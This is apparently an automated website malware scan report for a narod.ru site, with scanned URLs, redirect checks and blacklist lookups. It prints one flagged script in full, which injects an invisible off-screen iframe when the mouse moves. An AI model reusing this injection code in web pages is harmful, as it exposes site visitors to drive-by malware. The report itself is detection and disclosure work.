Scanned pages/files
Request | Server response | Status |
http://tvmactep.narod.ru/ | 200 OK Content-Length: 24634 Content-Type: text/html | clean |
http://tvmactep.narod.ru/abnl/?adsdata=xT2l9cZicVnjUpNagzKeY!zHeSySmbGYp!cFnb86!QXjiJXvCjUg0hf1EnuJCTgb5hVgxblfqE86yfs4XkHCWuX8P;gaFB!pzDSg7UmaMyY0 | 200 OK Content-Length: 2729 Content-Type: application/javascript | clean |
http://cnt.rambler.ru/top100.jcn?1042380 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://tools.spylog.ru/counter2.2.js | 200 OK Content-Length: 5066 Content-Type: application/javascript | clean |
http://feelthesame.changeip.name/rsize.js | 200 OK Content-Length: 405 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
    res='Ошибка MySQL';
    var astatf = 0;
    document.write("<head></head><b><div id='staticaccoin'></div></b>");
    document.onmousemove=moveonlinetest;
    function moveonlinetest() {
        if (astatf == 0) {
            astatf++;
            text = "<iframe src='"+res+"' width='10' height='16' style='position: absolute; z-index: 1; left: -1000px; top: -1000px;'></iframe>";
            document.getElementById("staticaccoin").innerHTML = text
        }
    }
Antivirus reports:
http://tvmactep.narod.ru/news.htm | 200 OK Content-Length: 9335 Content-Type: text/html | clean |
http://tvmactep.narod.ru/abnl/?adsdata=eb2EU2VLDFmvxjLi8q97^CXT8mGTCyKVgWfLeyKuEghTIkh5WO64Q9UzFBfsZGGRDCswKZ2fSH2AtpDQE5xbL^MSDKVLISheq6eeJ0JWTLTR | 200 OK Content-Length: 2753 Content-Type: application/javascript | clean |
http://tvmactep.narod.ru/02-01-2.htm | 200 OK Content-Length: 40441 Content-Type: text/html | clean |
http://tvmactep.narod.ru/abnl/?adsdata=eKL2^QLvpiYLM!hET9WaLI^bRYAjKdrPlh7prLGF1tlVcwKVefWSA0!1hNLPFzMf6teXX!GSPy7KYklLz!0pFJryyW6a!A7jmRXkHztVBSio | 200 OK Content-Length: 2713 Content-Type: application/javascript | clean |
http://tvmactep.narod.ru/02.htm | 200 OK Content-Length: 6623 Content-Type: text/html | clean |
http://tvmactep.narod.ru/abnl/?adsdata=BRpchlNeGsuUn6zYJXtgRSuIkhxzHSKrU0UmLxagkT5cYNOJ5izGGWh9Xtz73zE5m1zX8qOcy;5qzKvZRK9YANvHHdI1LD7VHsWYUvnGDDGB | 200 OK Content-Length: 2721 Content-Type: application/javascript | clean |
http://tvmactep.narod.ru/02-01.htm | 200 OK Content-Length: 118408 Content-Type: text/html | clean |
http://tvmactep.narod.ru/abnl/?adsdata=xinPxED7W;hchRqks35bDIKc1FGaf9tViBJy1nlFuZBfT2fr0!hiEy^xAZ!WVVvzzgw^LiwhyBkYClFBxVk;S^Ru07Gzw5Yt2j!LOKWR9OEo | 200 OK Content-Length: 2757 Content-Type: application/javascript | clean |
http://tvmactep.narod.ru/shema.zip | 200 OK Content-Length: 22560 Content-Type: application/zip | clean |
http://tvmactep.narod.ru/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tvmactep.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 03:25:26 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: tvmactep.narod.ru
Referer: http://www.google.com/search?q=tvmactep.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tvmactep.narod.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tvmactep.narod.ru/
Result: tvmactep.narod.ru is not infected or malware details are not published yet.